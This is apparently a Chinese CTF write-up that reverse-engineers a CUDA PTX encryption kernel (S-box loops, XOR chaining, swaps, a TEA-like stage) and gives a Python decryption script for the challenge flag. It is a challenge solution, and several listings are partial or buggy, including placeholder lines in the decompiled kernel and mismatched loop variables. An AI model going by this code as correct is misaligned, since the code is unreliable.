xor.b32 %r126, %r124, %r125;
shr.u32 %r127, %r122, 5;
add.s32 %r128, %r127, 338241895;
xor.b32 %r129, %r126, %r128;
add.s32 %r130, %r129, %r114;
shl.b32 %r131, %r130, 4;
add.s32 %r132, %r131, -1556008596;
add.s32 %r133, %r254, %r130;
shr.u32 %r134, %r130, 5;
add.s32 %r135, %r134, -939442524;
xor.b32 %r136, %r135, %r132;
xor.b32 %r137, %r136, %r133;
add.s32 %r138, %r137, %r122;
shl.b32 %r139, %r138, 4;
add.s32 %r140, %r139, 1013904242;
add.s32 %r141, %r138, %r254;
xor.b32 %r142, %r140, %r141;
shr.u32 %r143, %r138, 5;
add.s32 %r144, %r143, 338241895;
xor.b32 %r145, %r142, %r144;
add.s32 %r146, %r145, %r130;
shl.b32 %r147, %r146, 4;
add.s32 %r148, %r147, -1556008596;
add.s32 %r149, %r255, %r146;
shr.u32 %r150, %r146, 5;
add.s32 %r151, %r150, -939442524;
xor.b32 %r152, %r151, %r148;
xor.b32 %r153, %r152, %r149;
add.s32 %r154, %r153, %r138;
shl.b32 %r155, %r154, 4;
add.s32 %r156, %r155, 1013904242;
add.s32 %r157, %r154, %r255;
xor.b32 %r158, %r156, %r157;
shr.u32 %r159, %r154, 5;
add.s32 %r160, %r159, 338241895;
xor.b32 %r161, %r158, %r160;
add.s32 %r162, %r161, %r146;
shl.b32 %r163, %r162, 4;
add.s32 %r164, %r163, -1556008596;
add.s32 %r165, %r256, %r162;
shr.u32 %r166, %r162, 5;
add.s32 %r167, %r166, -939442524;
xor.b32 %r168, %r167, %r164;
xor.b32 %r169, %r168, %r165;
add.s32 %r170, %r169, %r154;
shl.b32 %r171, %r170, 4;
add.s32 %r172, %r171, 1013904242;
add.s32 %r173, %r170, %r256;
xor.b32 %r174, %r172, %r173;
shr.u32 %r175, %r170, 5;
add.s32 %r176, %r175, 338241895;
xor.b32 %r177, %r174, %r176;
add.s32 %r178, %r177, %r162;
shl.b32 %r179, %r178, 4;
add.s32 %r180, %r179, -1556008596;
add.s32 %r181, %r257, -1013904242;
add.s32 %r182, %r181, %r178;
shr.u32 %r183, %r178, 5;
add.s32 %r184, %r183, -939442524;
xor.b32 %r185, %r184, %r180;
xor.b32 %r186, %r185, %r182;
add.s32 %r187, %r186, %r170;
shl.b32 %r188, %r187, 4;
add.s32 %r189, %r188, 1013904242;
add.s32 %r190, %r187, %r181;
xor.b32 %r191, %r189, %r190;
shr.u32 %r192, %r187, 5;
add.s32 %r193, %r192, 338241895;
xor.b32 %r194, %r191, %r193;
add.s32 %r195, %r194, %r178;
shl.b32 %r196, %r195, 4;
add.s32 %r197, %r196, -1556008596;
add.s32 %r198, %r257, 1640531527;
add.s32 %r199, %r198, %r195;
shr.u32 %r200, %r195, 5;
add.s32 %r201, %r200, -939442524;
xor.b32 %r202, %r201, %r197;
xor.b32 %r203, %r202, %r199;
add.s32 %r204, %r203, %r187;
shl.b32 %r205, %r204, 4;
add.s32 %r206, %r205, 1013904242;
add.s32 %r207, %r204, %r198;
xor.b32 %r208, %r206, %r207;
shr.u32 %r209, %r204, 5;
add.s32 %r210, %r209, 338241895;
xor.b32 %r211, %r208, %r210;
add.s32 %r212, %r211, %r195;
shl.b32 %r213, %r212, 4;
add.s32 %r214, %r213, -1556008596;
add.s32 %r215, %r257, %r212;
shr.u32 %r216, %r212, 5;
add.s32 %r217, %r216, -939442524;
xor.b32 %r218, %r217, %r214;
xor.b32 %r219, %r218, %r215;
add.s32 %r260, %r219, %r204;
shl.b32 %r220, %r260, 4;
add.s32 %r221, %r220, 1013904242;
add.s32 %r222, %r260, %r257;
xor.b32 %r223, %r221, %r222;
shr.u32 %r224, %r260, 5;
add.s32 %r225, %r224, 338241895;
xor.b32 %r226, %r223, %r225;
add.s32 %r259, %r226, %r212;
add.s32 %r257, %r257, -239350328;
add.s32 %r256, %r256, -239350328;
add.s32 %r255, %r255, -239350328;
add.s32 %r254, %r254, -239350328;
add.s32 %r253, %r253, -239350328;
add.s32 %r252, %r252, -239350328;
add.s32 %r258, %r258, 8;
setp.ne.s32 %p34, %r258, 10485760;
@%p34 bra $L__BB0_41;

st.global.u32 [%rd3], %r260;
st.global.u32 [%rd3+4], %r259;

$L__BB0_43:
bar.sync 0;
@%p7 bra $L__BB0_52;

mov.u64 %rd82, $str$6;
cvta.global.u64 %rd83, %rd82;
mov.u64 %rd84, 0;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd83;
.param .b64 param1;
st.param.b64 [param1+0], %rd84;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r227, [retval0+0];
}
        @%p10 bra $L__BB0_51;

add.s32 %r229, %r1, -1;
and.b32 %r264, %r1, 3;
setp.lt.u32 %p37, %r229, 3;
mov.u32 %r263, 0;
@%p37 bra $L__BB0_48;

sub.s32 %r262, %r1, %r264;
mov.u64 %rd87, $str$1;
cvta.global.u64 %rd88, %rd87;

$L__BB0_47:
cvt.s64.s32 %rd85, %r263;
add.s64 %rd86, %rd1, %rd85;
ld.global.u8 %r231, [%rd86];
st.local.u32 [%rd2], %r231;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd88;
.param .b64 param1;
st.param.b64 [param1+0], %rd20;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r232, [retval0+0];
}
        ld.global.u8 %r233, [%rd86+1];
st.local.u32 [%rd2], %r233;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd88;
.param .b64 param1;
st.param.b64 [param1+0], %rd20;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r234, [retval0+0];
}
        ld.global.u8 %r235, [%rd86+2];
st.local.u32 [%rd2], %r235;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd88;
.param .b64 param1;
st.param.b64 [param1+0], %rd20;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r236, [retval0+0];
}
        ld.global.u8 %r237, [%rd86+3];
st.local.u32 [%rd2], %r237;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd88;
.param .b64 param1;
st.param.b64 [param1+0], %rd20;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r238, [retval0+0];
}
        add.s32 %r263, %r263, 4;
add.s32 %r262, %r262, -4;
setp.ne.s32 %p38, %r262, 0;
@%p38 bra $L__BB0_47;

$L__BB0_48:
setp.eq.s32 %p39, %r264, 0;
@%p39 bra $L__BB0_51;

cvt.s64.s32 %rd90, %r263;
add.s64 %rd102, %rd1, %rd90;
mov.u64 %rd91, $str$1;
cvta.global.u64 %rd92, %rd91;

$L__BB0_50:
.pragma "nounroll";
ld.global.u8 %r239, [%rd102];
st.local.u32 [%rd2], %r239;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd92;
.param .b64 param1;
st.param.b64 [param1+0], %rd20;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r240, [retval0+0];
}
        add.s64 %rd102, %rd102, 1;
add.s32 %r264, %r264, -1;
setp.ne.s32 %p40, %r264, 0;
@%p40 bra $L__BB0_50;

$L__BB0_51:
mov.u64 %rd94, $str$2;
cvta.global.u64 %rd95, %rd94;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd95;
.param .b64 param1;
st.param.b64 [param1+0], %rd84;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r241, [retval0+0];
}

$L__BB0_52:
bar.sync 0;
cvt.u16.u32 %rs54, %r4;
ld.global.u8 %rs55, [%rd3];
xor.b16 %rs56, %rs55, %rs54;
st.global.u8 [%rd3], %rs56;
ret;

然后就开始痛苦的人肉反编译,一开始用gpt试了一下,效果太差了,不是给人看的,初始化了T盒和RT盒,一开始还以为是AES,但是读到L__BB0_41部分之后发现有类似tea的特征,T盒的内容有5个大循环中使用进行混淆

uint8_t* rd3 = (uint8_t*)(rd1 + r4);
uint8_t rs13 = *rd3;
uint16_t rs14 = (uint16_t)r4;
uint16_t rs15 = rs14*73;
uint16_t rs16 = rs15+temp;
uint16_t rs17 = rs13 ^ rs16;
uint16_t rs18 = rs17 & 0xF0;
uint16_t rs19 = rs18 >> 4;
uint16_t rs20 = rs17 << 4;
uint16_t rs58 = rs19 | rs20;

for(int i=0;i<10485760;i++)
{
    uint8_t rs21 = T[rs58 & 0xFF]
    uint16_t rs22 = rs21 >> 4;
    uint16_t rs23 = rs21 << 4;
    uint16_t rs24 = rs22 | rs23;
    rs58 = rs24 ^ (uint16_t)i;
}

for(int i=0;i<10485760;i++)
{
    uint8_t rs26 = T[rs58 & 0xFF]
    uint16_t rs27 = rs26 >> 4;
    uint16_t rs28 = rs26 << 4;
    uint16_t rs29 = rs27 | rs28;
    rs58 = rs29 ^ (uint16_t)i;
}

for(int i=0;i<10485760;i++)
{
    uint8_t rs31 = T[rs58 & 0xFF]
    uint16_t rs32 = rs31 >> 4;
    uint16_t rs33 = rs31 << 4;
    uint16_t rs34 = rs32 | rs33;
    rs58 = rs34 ^ (uint16_t)i;
}

for(int i=0;i<10485760;i++)
{
    uint8_t rs36 = T[rs58 & 0xFF]
    uint16_t rs37 = rs36 >> 4;
    uint16_t rs38 = rs36 << 4;
    uint16_t rs39 = rs37 | rs38;
    rs58 = rs39 ^ (uint16_t)i;
}

for(int i=0;i<10485760;i++)
{
    uint8_t rs41 = T[rs58 & 0xFF]
    uint16_t rs42 = rs36 >> 4;
    uint16_t rs43 = rs36 << 4;
    uint16_t rs44 = rs37 | rs38;
    rs58 = rs44 ^ (uint16_t)i;
}

uint32_t r257 = -239350328;
uint32_t r256 = 387276957;
uint32_t r255 = 2027808484;
uint32_t r254 = -626627285;
uint32_t r253 = 1013904242;
uint32_t r252 = -1640531527

k = {-1556008596,-939442524,1013904242,338241895};
uint32_t k0=k[0],k1=k[1],k2=k[2],k3=k[3];

for(int i=0;i<10485760;i+=8)
{
    v0 += (v1<<4+k0)^(v1 + r252)^(v1>>5 + k1)
    v1 += (v0<<4+k2)^(v0 + r252)^(v0>>5 + k3)

    v0 += (v1<<4+k0)^(v1 + r253)^(v1>>5 + k1)
    v1 += (v0<<4+k2)^(v0 + r253)^(v0>>5 + k3)

    v0 += (v1<<4+k0)^(v1 + r254)^(v1>>5 + k1)
    v1 += (v0<<4+k2)^(v0 + r254)^(v0>>5 + k3)

    v0 += (v1<<4+k0)^(v1 + r255)^(v1>>5 + k1)
    v1 += (v0<<4+k2)^(v0 + r255)^(v0>>5 + k3)

    v0 += (v1<<4+ k0)^(v1 + r256)^(v1>>5 + k1)
    v1 += (v0<<4+ k2)^(v0 + r256)^(v0>>5 + k3)

    v0 += (v1<<4+ k0)^(v1 + (r257 - 1013904242))^(v1>>5 + k1)
    v1 += (v0<<4+ k2)^(v0 + (r257 - 1013904242))^(v0>>5 + k3)

    v0 += (v1<<4+ k0)^(v1+ (r257 + 1640531527))^(v1>>5 + k1)
    v1 += (v0<<4+ k2)^(v0+ (r257 + 1640531527))^(v0>>5 + k3)

    v0 += (v1<<4+ k0)^(v1+ r257)^(v1>>5+ k1)
    v1 += (v0<<4+ k2)^(v0+ r257)^(v0>>5+ k3)
    
    r257 -= 239350328;
    r256 -= 239350328;
    r255 -= 239350328;
    r254 -= 239350328;
    r253 -= 239350328;
    r252 -= 239350328;
    
}

还是有部分内容解读欠妥,直接上grok反编译一下,然后进行修正,主要加密顺序可以分为5个部分了,先是每个线程从全局内存读取数据 data[idx],也就是input,对数据进行初步的异或和位操作,然后进行 5 个独立的循环(每个循环 10485760 次),使用常量数组 T 进行 S-box 变换,对变换结果进行位移(高低 4 位交换)并与循环计数异或,这部分可以直接求逆盒之后直接化简掉,然后再是相邻数据异或阶段,从第二个元素开始,计算 temp = data[i - 1] ^ key ^ data[i]。将结果存储回 data[i - 1],再是数据交换位置操作,然后再是类似tea的操作,最后还有一个简单的异或过程。不过总体来说反编译的几乎是相当不错了,第一步的key从ida里面分析可以得到是172传入的

#include <stdio.h>
#include <stdint.h>

#define BLOCK_SIZE 256  // 假设块大小为 256,具体值需根据上下文确定

// 外部函数声明
extern "C" int vprintf(const char *format, ...);

// 常量数组 T 和 RT(RT 在代码中未使用,可忽略)
const uint8_t T[256] = {
    99, 124, 119, 123, 242, 107, 111, 197, 48, 1, 103, 43, 254, 215, 171, 118,
    202, 130, 201, 125, 250, 89, 71, 240, 173, 212, 162, 175, 156, 164, 114, 192,
    183, 253, 147, 38, 54, 63, 247, 204, 52, 165, 229, 241, 113, 216, 49, 21,
    4, 199, 35, 195, 24, 150, 5, 154, 7, 18, 128, 226, 235, 39, 178, 117,
    9, 131, 44, 26, 27, 110, 90, 160, 82, 59, 214, 179, 41, 227, 47, 132,
    83, 209, 0, 237, 32, 252, 177, 91, 106, 203, 190, 57, 74, 76, 88, 207,
    208, 239, 170, 251, 67, 77, 51, 133, 69, 249, 2, 127, 80, 60, 159, 168,
    81, 163, 64, 143, 146, 157, 56, 245, 188, 182, 218, 33, 16, 255, 243, 210,
    205, 12, 19, 236, 95, 151, 68, 23, 196, 167, 126, 61, 100, 93, 25, 115,
    96, 129, 79, 220, 34, 42, 144, 136, 70, 238, 184, 20, 222, 94, 11, 219,
    224, 50, 58, 10, 73, 6, 36, 92, 194, 211, 172, 98, 145, 149, 228, 121,
    231, 200, 55, 109, 141, 213, 78, 169, 108, 86, 244, 234, 101, 122, 174, 8,
    186, 120, 37, 46, 28, 166, 180, 198, 232, 221, 116, 31, 75, 189, 139, 138,
    112, 62, 181, 102, 72, 3, 246, 14, 97, 53, 87, 185, 134, 193, 29, 158,
    225, 248, 152, 17, 105, 217, 142, 148, 155, 30, 135, 233, 206, 85, 40, 223,
    140, 161, 137, 13, 191, 230, 66, 104, 65, 153, 45, 15, 176, 84, 187, 22
};

// 全局字符串
const char str[] = "gift1:\n";
const char str1[] = "%02x ";
const char str2[] = "\n";
const char str3[] = "gift2:\n";
const char str4[] = "gift3:\n";
const char str5[] = "gift4:\n";
const char str6[] = "gift5:\n";

__global__ void encrypt_kernel(uchar *data, uchar key) {
    uint32_t tid = threadIdx.x;  // 线程 ID
    uint32_t bid = blockIdx.x;   // 块 ID
    uint32_t idx = bid * blockDim.x + tid;  // 全局线程索引
    
    // 检查是否在块内执行
    if (tid < blockDim.x) {
        uchar val = data[idx];
        uint16_t temp = (uint16_t)idx * 73 + key;
        val ^= temp;
        val = (val & 0xF0) | (val << 4);
        
        // 多次应用 S-box 变换(共 5 个 10485760 次的循环)
        for (int i = 0; i < 10485760; i++) {
            uint8_t index = val & 0xFF;
            uint8_t s_val = T[index];
            s_val = (s_val >> 4) | (s_val << 4);
            val = s_val ^ (uint16_t)i;
        }
        for (int i = 0; i < 10485760; i++) {
            uint8_t index = val & 0xFF;
            uint8_t s_val = T[index];
            s_val = (s_val >> 4) | (s_val << 4);
            val = s_val ^ (uint16_t)i;
        }
        for (int i = 0; i < 10485760; i++) {
            uint8_t index = val & 0xFF;
            uint8_t s_val = T[index];
            s_val = (s_val >> 4) | (s_val << 4);
            val = s_val ^ (uint16_t)i;
        }
        for (int i = 0; i < 10485760; i++) {
            uint8_t index = val & 0xFF;
            uint8_t s_val = T[index];
            s_val = (s_val >> 4) | (s_val << 4);
            val = s_val ^ (uint16_t)i;
        }
        for (int i = 0; i < 10485760; i++) {
            uint8_t index = val & 0xFF;
            uint8_t s_val = T[index];
            s_val = (s_val >> 4) | (s_val << 4);
            val = s_val ^ (uint16_t)i;
        }
        
        data[idx] = val;
    }
    
    __syncthreads();
    
    // 打印 gift1 阶段的结果(仅由 idx == 0 的线程执行)
    if (idx == 0) {
        printf("gift1:\n");
        for (int i = 0; i < blockDim.x; i++) {
            printf("%02x ", data[i]);
        }
        printf("\n");
    }
    
    __syncthreads();
    
    // 线程 0 处理相邻数据的异或操作
    if (tid == 0) {
        for (int i = 1; i < blockDim.x; i++) {
            uchar temp = data[i - 1] ^ key;
            temp ^= data[i];
            data[i - 1] = temp;
        }
    }
    
    __syncthreads();
    
    // 打印 gift2 阶段的结果(仅由 idx == 0 的线程执行)
    if (idx == 0) {
        printf("gift2:\n");
        for (int i = 0; i < blockDim.x; i++) {
            printf("%02x ", data[i]);
        }
        printf("\n");
    }
    
    __syncthreads();
    
    // 奇数线程 ID 交换相邻数据
    if (tid % 2 == 1 && tid < blockDim.x - 1) {
        uchar temp = data[idx];
        data[idx] = data[idx + 1];
        data[idx + 1] = temp;
    }
    
    __syncthreads();
    
    // 打印 gift3 阶段的结果(仅由 idx == 0 的线程执行)
    if (idx == 0) {
        printf("gift3:\n");
        for (int i = 0; i < blockDim.x; i++) {
            printf("%02x ", data[i]);
        }
        printf("\n");
    }
    
    __syncthreads();
    
    // 奇数线程 ID 再次交换相邻数据(需确保线程 ID >= 1)
    if (tid >= 1 && tid % 2 == 1 && tid < blockDim.x - 1) {
        uchar temp = data[idx];
        data[idx] = data[idx + 1];
        data[idx + 1] = temp;
    }
    
    __syncthreads();
    
    // 打印 gift4 阶段的结果(仅由 idx == 0 的线程执行)
    if (idx == 0) {
        printf("gift4:\n");
        for (int i = 0; i < blockDim.x; i++) {
            printf("%02x ", data[i]);
        }
        printf("\n");
    }
    
    __syncthreads();
    
    // 每 8 个线程执行复杂的位操作(可能是某种加密算法的一部分)
    if (tid % 8 == 0 && tid < blockDim.x) {
        uint32_t val1 = *(uint32_t*)(&data[idx]);
        uint32_t val2 = *(uint32_t*)(&data[idx + 4]);
        uint32_t constants[6] = {
            -1640531527, 1013904242, -626627285, 2027808484, 387276957, -239350328
        };
        uint32_t temp_val1 = val1, temp_val2 = val2;
        
        for (int i = 0; i < 10485760; i += 8) {
            // 复杂的位操作和异或运算,涉及常量和移位
            // 由于过于复杂,此处仅示意,具体实现需根据 PTX 代码进一步分析
            temp_val1 = /* 复杂的位操作 */;
            temp_val2 = /* 复杂的位操作 */;
            // 更新常量
            for (int j = 0; j < 6; j++) {
                constants[j] -= 239350328;
            }
        }
        
        *(uint32_t*)(&data[idx]) = temp_val1;
        *(uint32_t*)(&data[idx + 4]) = temp_val2;
    }
    
    __syncthreads();
    
    // 打印 gift5 阶段的结果(仅由 idx == 0 的线程执行)
    if (idx == 0) {
        printf("gift5:\n");
        for (int i = 0; i < blockDim.x; i++) {
            printf("%02x ", data[i]);
        }
        printf("\n");
    }
    
    __syncthreads();
    
    // 最终操作:每个线程对其数据进行异或
    if (tid < blockDim.x) {
        data[idx] ^= (uchar)idx;
    }
}

然后可以编写对应的解密EXP如下:

import struct

RT = [
    0x3e, 0xa8, 0xb8, 0x66, 0xcc, 0x24, 0xde, 0x3b, 0x72, 0xdf, 0xf1, 0xd3, 0x9e, 0xbb, 0xea, 0x10, 0x59, 0x83, 0x1e,0xe6, 0x58, 0x26, 0xd8, 0xa3, 0xb5, 0x44, 0x42, 0xf6, 0xd2, 0xe3, 0x7c, 0x6e, 0x91, 0x40, 0x22, 0x9d, 0x4e, 0x9f,0x1b, 0xc8, 0x7b, 0x17, 0xf3, 0x03, 0xf0, 0xa4, 0xb3, 0xad, 0x0f, 0x96, 0xae, 0xef, 0x2e, 0x52, 0x16, 0x47, 0x13,0x20, 0xe5, 0x79, 0xdc, 0x92, 0x3a, 0xfd, 0xfc, 0x4b, 0x50, 0x2f, 0xb9, 0xcf, 0x15, 0x98, 0xf8, 0xba, 0x01, 0x7d,0x6f, 0x8f, 0x39, 0xd0, 0x7f, 0x99, 0xfe, 0x77, 0x81, 0x48, 0xd9, 0x11, 0xa0, 0x89, 0xe7, 0xdd, 0x04, 0x43, 0xa2,0x4d, 0x08, 0x5f, 0x71, 0x09, 0xd1, 0x02, 0xf4, 0xab, 0x8e, 0xa5, 0x07, 0x3f, 0x6c, 0x4f, 0x27, 0xe0, 0x1f, 0xbd,0x23, 0xc4, 0x1c, 0x0e, 0x80, 0x65, 0x74, 0xeb, 0x54, 0x64, 0xfb, 0xd4, 0x2d, 0x56, 0xc0, 0xc6, 0xee, 0xec, 0x55,0x87, 0x9c, 0x5a, 0xb4, 0xb7, 0x67, 0x90, 0x82, 0x6a, 0xa7, 0x29, 0x06, 0xe8, 0x88, 0x2a, 0x94, 0x35, 0x6b, 0x0d,0x0c, 0xc9, 0xda, 0x2c, 0x5c, 0xc3, 0x21, 0xbc, 0x41, 0x25, 0x97, 0xbe, 0x62, 0x73, 0x8c, 0xd6, 0x05, 0xbf, 0xaa,0xe9, 0xf7, 0x93, 0x3c, 0x78, 0xc2, 0x4a, 0xb2, 0x12, 0xa1, 0x75, 0xf2, 0xe1, 0xd5, 0x30, 0x3d, 0x9b, 0x53, 0xce,0x60, 0x8b, 0x8d, 0xa9, 0x36, 0x9a, 0x19, 0xb0, 0xff, 0xb6, 0xf5, 0x57, 0xb1, 0xc7, 0x38, 0x61, 0x85, 0xe2, 0xca,0x34, 0x33, 0xdb, 0x32, 0x7e, 0x2b, 0x7a, 0xfa, 0x69, 0xed, 0x1a, 0xcd, 0x70, 0x63, 0x86, 0x84, 0x0b, 0x00, 0x5e,0x76, 0xaf, 0x45, 0x46, 0xcb, 0x68, 0x49, 0x14, 0x5b, 0xf9, 0xe4, 0x4c, 0xc1, 0x95, 0x31, 0xd7, 0x51, 0x0a, 0xc5,0x28, 0x37, 0x5d, 0xac, 0x18, 0x1d, 0x8a, 0x6d, 0xa6
]
def cuda_decrypt(enc):
    enc = bytearray(enc)

    for i in range(256):
        enc[i] ^= i

    for i in range(0, 256, 8):
        t0 = struct.unpack('<I', enc[i:i+4])[0]
        t1 = struct.unpack('<I', enc[i+4:i+8])[0]

        temp = [-239350328, 387276957, 2027808484, -626627285, 1013904242, -1640531527]
        key = [0] * 6
        for j in range(6):
            key[j] = temp[j] + (-239350328 * 0x140000)

        for j in range(0, 10485760, 8):
            for k in range(6):
                key[k] = (key[k] + 239350328) & 0xFFFFFFFF 

            t1 = (t1 - (((t0 << 4) + 1013904242) ^ ((t0 >> 5) + 338241895) ^ (t0 + key[0]))) & 0xFFFFFFFF
            t0 = (t0 - (((t1 << 4) + -1556008596) ^ ((t1 >> 5) + -939442524) ^ (key[0] + t1))) & 0xFFFFFFFF
            
            t1 = (t1 - (((t0 << 4) + 1013904242) ^ ((t0 >> 5) + 338241895) ^ (t0 + key[0] + 1640531527))) & 0xFFFFFFFF
            t0 = (t0 - (((t1 << 4) + -1556008596) ^ ((t1 >> 5) + -939442524) ^ (key[0] + 1640531527 + t1))) & 0xFFFFFFFF
            
            t1 = (t1 - (((t0 << 4) + 1013904242) ^ ((t0 >> 5) + 338241895) ^ (t0 + key[0] - 1013904242))) & 0xFFFFFFFF
            t0 = (t0 - (((t1 << 4) + -1556008596) ^ ((t1 >> 5) + -939442524) ^ (key[0] - 1013904242 + t1))) & 0xFFFFFFFF
            
            t1 = (t1 - (((t0 << 4) + 1013904242) ^ ((t0 >> 5) + 338241895) ^ (t0 + key[1]))) & 0xFFFFFFFF
            t0 = (t0 - (((t1 << 4) + -1556008596) ^ ((t1 >> 5) + -939442524) ^ (key[1] + t1))) & 0xFFFFFFFF
            
            t1 = (t1 - (((t0 << 4) + 1013904242) ^ ((t0 >> 5) + 338241895) ^ (t0 + key[2]))) & 0xFFFFFFFF
            t0 = (t0 - (((t1 << 4) + -1556008596) ^ ((t1 >> 5) + -939442524) ^ (key[2] + t1))) & 0xFFFFFFFF
            
            t1 = (t1 - (((t0 << 4) + 1013904242) ^ ((t0 >> 5) + 338241895) ^ (t0 + key[3]))) & 0xFFFFFFFF
            t0 = (t0 - (((t1 << 4) + -1556008596) ^ ((t1 >> 5) + -939442524) ^ (key[3] + t1))) & 0xFFFFFFFF
            
            t1 = (t1 - (((t0 << 4) + 1013904242) ^ ((t0 >> 5) + 338241895) ^ (t0 + key[4]))) & 0xFFFFFFFF
            t0 = (t0 - (((t1 << 4) + -1556008596) ^ ((t1 >> 5) + -939442524) ^ (key[4] + t1))) & 0xFFFFFFFF
            
            t1 = (t1 - (((t0 << 4) + 1013904242) ^ ((t0 >> 5) + 338241895) ^ (t0 + key[5]))) & 0xFFFFFFFF
            t0 = (t0 - (((t1 << 4) + -1556008596) ^ ((t1 >> 5) + -939442524) ^ (key[5] + t1))) & 0xFFFFFFFF

        enc[i:i+4] = struct.pack('<I', t0)
        enc[i+4:i+8] = struct.pack('<I', t1)

    for i in range(0, 256, 2):
        data = enc[i]
        enc[i] = enc[(i - 1 + 256) % 256]
        enc[(i - 1 + 256) % 256] = data

    for i in range(0, 256, 2):
        data = enc[i]
        enc[i] = enc[(i + 1 + 256) % 256]
        enc[(i + 1) % 256] = data

    for i in range(255, -1, -1):
        enc[i] ^= 172 ^ enc[(i + 1) % 256]

    for i in range(256):
        data = RT[enc[i]]
        data = ((data >> 4) | (data << 4)) & 0xFF
        data ^= (i * 73 + 172) & 0xFF
        enc[i] = data

    return bytes(enc)

def main():

    with open("flag_enc", "rb") as f:
        content = bytearray(f.read())
    
    size = len(content)
    for i in range(0, size, 255): 
        block = content[i:i+256]
        if len(block) < 256:  
            block += bytearray(256 - len(block))
        decrypted_block = cuda_decrypt(block)
        content[i:i+256] = decrypted_block

    with open("flag", "wb") as f:
        f.write(content)

if __name__ == "__main__":
    main()